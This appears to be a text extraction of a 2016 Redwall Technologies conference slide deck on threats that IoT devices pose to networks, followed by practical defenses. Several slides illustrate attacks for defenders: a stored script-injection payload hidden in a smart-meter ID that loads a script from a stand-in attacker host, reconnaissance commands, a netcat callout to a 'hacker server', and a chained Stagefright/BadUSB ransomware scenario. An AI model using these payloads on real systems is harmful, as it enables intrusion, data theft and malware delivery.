25
Copyright 2014-2016 Redwall Technologies LLC. REDWALL MOBILE is a registered trademark of Redwall Technologies LLC. All rights reserved. This material is for information purposes only and does not constitute and offer to sell any goods or services. Redwall Technologies LLC Threats from IoT Devices INTERNET of THINGS North America April 13th, 2016

Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

  • Upload
    others

  • View
    0

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Copyright 2014-2016 Redwall Technologies LLC. REDWALL MOBILE is a registered trademark of Redwall Technologies LLC. All rights reserved. This material is for information purposes only and does not constitute and offer to sell any goods or services.

RedwallTechnologies LLC

Threats from IoT Devices

INTERNET of THINGSNorth America

April 13th, 2016

Page 2: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Your presenter: Eric Üner

2

CTO RedwallDevice security for mobiles, wearables, SCADA, and IoT

Integrity monitoring, root protection, DPA resistance and more

Offensive workNot a researcher - call it "applied ethical hacking"

Typically government only

Wide range of devices

Defensive WorkOften direct response to offensive work

Systems, algorithms, architectures

Page 3: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Last time, we discussed protecting devices

3

ZigBee

Bluetooth WiFi

LTE

Page 4: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

This time, we’re protecting you from those devices

4

ZigBee

Bluetooth WiFi

LTE

Page 5: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Goals for today

Understand some options to for protecting your..NetworkTrusted devicesInfrastructure

From…Untrusted or rogue devicesUnexpected behaviors by IoT devices

Think about IoT threats in a new way

5

Page 6: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Know your enemy

Simple water meter example:

Does it use my WiFi? 3G? Something else? What frequencies?Who updates it and how?

What data does it send?The area is ITAR controlled, so can the installer enter?Who makes the equipment?

Why is it already out of the box?What data goes where?

6

Page 7: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Use of LAN router to attack other connected devices

Baseband attacks on cellular infrastructure WAN attacks including DDoS

Control or infection of backend management and data serversData corruption

Attack vectors from IoT devices

7

False dataData leakagePower/resource consumptionPhysical damage

Infecting management devices with malware over USB, Bluetooth, etc.

Page 8: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Stage 2. exploit controls smartwatch to inject USB malware (ala BadUSB)

Tethered and local threats

8

?

Stage 1. MMS infected media file (e.g., Stagefright) Stage 3. Media file and

exploit spread to PC and smartphone, causing them to install ransomware

Page 9: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Send results or open connection (nc) to hacker server

LAN targets

9

ICMP to router (e.g., ping 10.0.1.255)

Display all ARP entries (arp -a)

Profile and target each device

Page 10: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

WAN targets

10

Stage 1. Attacker changes meter ID from "7242-PMR" to "7242-PMR\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72…\x73\x27\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0a"

Stage 3. Customer checks power usage, and browser loads "7242-PMR<script src='http://badguyrus.xy/evilscript.js'></script>"

Stage 2. Mesh network propagates ID, back-end database lookups use 9 chars, but stores full ID

Page 11: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Privacy and practical issues

How much data is collected?Will big data analysis show when I am home, when I am in the car, when I am on vacation, when I leave for work?

Will attackers be able to trick utilities into shutting me off? What about everyone’s at once?When there is a cyber incident, whom do I call?

For smart meters, does the city, village, or utility company even understand any of this?Does a bug in a smart thermostat make the device manufacturer liable for my higher bills?

11

Page 12: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Where does beneficial become invasive?

12

I see you’re buying a lot of Cherry Garcia…

Season 1 2 3 4 5+

And you’re binge-watching five seasons of The Wire…

+

You haven’t turned on the bedroom lights in two days…

=

So I emailed your doctor and got you some anti-depressants

Page 13: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Practical defenses

Enough gloom and doom, some good news: there are dozens of easy to implement defenses

13

Page 14: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Device resiliency

Admittedly biased because this is what Redwall’s product helps with from design to deployment

Likely the most important aspect of defense

It does all seem to start at the device:

14

Design/ArchitectureExploitable bugs

Unexpected interactions

Bad assumptions

That’s actually a feature

Page 15: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Encryption and authenticationEncryption is not a panacea! Encrypted != SecureNot having it guarantees higher risk, having it does not guarantee lower riskMust be done right and as part of a complete solutionDon’t just buy an encryption product - really integrate it with proper entropy, key management and storage, and zeroization

15

Trusted bootRun-time integrity checkingTrustzone-based securitySigned and trusted appsStill trivially pwned

Sorry, but

Page 16: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Attestation

Makes it harder for attackers to pretend to be one of your devicesAllows you to asses trust level in devices (caveat, Redwall has some IP in this area)Only effective if the device is highly robust and has ephemeral, session or state-based data, or firmware or ID/key data too difficult to extract

16

Initialization vector + parms

Enciphered hash of IV + parms

Correct answer, start a session + parms

Some data for this session + parms

Page 17: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Connectivity alternatives

WiFi, Ethernet (incl. over power)

Disadvantage: Device needs to secure password, key, and MAC addy; WiFi subject to jamming

Advantage: Simpler ; more robust if premise adds firewalls, proxies, and other controls

Suggestion: Set up a "guest" or dedicated network restricted to known MAC addresses

17

Page 18: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Connectivity alternatives

2G, 3G, 4G etc.Disadvantage: Most network topologies subject to typical RF issues; no opportunity for firewalls, proxies, and other controls; highly susceptible to worms and other takedowns Advantage: Simpler installation; no access to premise network required (actually no premise network required)Suggestion: Check frequencies, security policies and documentation of devices; ensure they are verifiably new when installed

18

Page 19: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Connectivity alternatives

BLE and other low-power EM/RF

Disadvantage: Short range; pairs with limited devices; difficult to add protection layers such as firewalls and proxies

Advantage: Short range; pairing often uses fixed PINs and is easy to force

Suggestion: Add physical protection; use in appropriate security context

19

Page 20: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

IoT firewalls and IT countermeasuresIoT topologies often need more scrutiny and effort than classic IT networksFor example, please, please don’t do this:

20

CAN Bus controllerTranceiver

I may already have hacked these and have them as a launch point now

Single point to attack

Attack may happen inside defense perimeter

ECU et al may have their own connectivity

Page 21: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

IoT firewalls and IT countermeasures

Firewalls may add authentication and simplify remote access, but are definitely not the primary security measure

Build security layers into each node (less complex than it sounds)

21

CAN Bus controllerTranceiver

Page 22: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Anonymity vs traceability

Most of the time, it’s not even practical anyway

22

When defending from IoT, many users head straight for anonymity

But it’s an illusion…

Registered these with the same email

Paid for this with your credit card

Hide your IP but then login with your email anyway when you get there

Page 23: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Logging and responding to threats

Defenses are no good if you can not prove they are working, and analyze what went wrong when they do not

At the same time, device logs provide a wealth of data for attackers

False positives are not just time consuming, they may be the whole point of the attack

23

Page 24: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Redwall Technologies

Summary

Trust no device, no interface, no controller implicitly - always verify comms and authenticityIoT devices are often highly capable sensors and recording devices - treat them as suchApply additional scrutiny to network designsBuild security into your IoT device design and do not become a threat yourselfThere are a lot of vendors here doing a terrific job - ask, discuss, and collaborate

24

Page 25: Redwall - Protecting your network from the IoT...Redwall Technologies Your presenter: Eric Üner 2 CTO Redwall Device security for mobiles, wearables, SCADA, and IoT Integrity monitoring,

Copyright 2014-2016 Redwall Technologies LLC. REDWALL MOBILE is a registered trademark of Redwall Technologies LLC. All rights reserved. This material is for information purposes only and does not constitute and offer to sell any goods or services.

Thank you!

http://www.redwall.us

Eric Ridvan ÜnerChief Technology Officer(847) [email protected]